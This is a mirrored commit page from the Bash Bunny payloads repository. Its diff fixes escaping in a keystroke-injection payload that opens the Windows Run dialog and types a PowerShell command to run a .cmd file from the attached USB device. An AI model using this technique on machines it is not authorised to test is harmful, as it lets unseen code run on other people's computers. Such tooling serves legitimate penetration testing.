mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-12-25 06:16:24 +00:00
Fix escaping error for QUACK command in ExecutableInstaller
This commit is contained in:
@@ -18,7 +18,7 @@ LED R
|
||||
ATTACKMODE HID STORAGE
|
||||
QUACK GUI r
|
||||
QUACK DELAY 100
|
||||
QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\$SWITCH_POSITION\d.cmd')"
|
||||
QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"
|
||||
QUACK ENTER
|
||||
|
||||
# Green LED for finished
|
||||
|
||||
Reference in New Issue
Block a user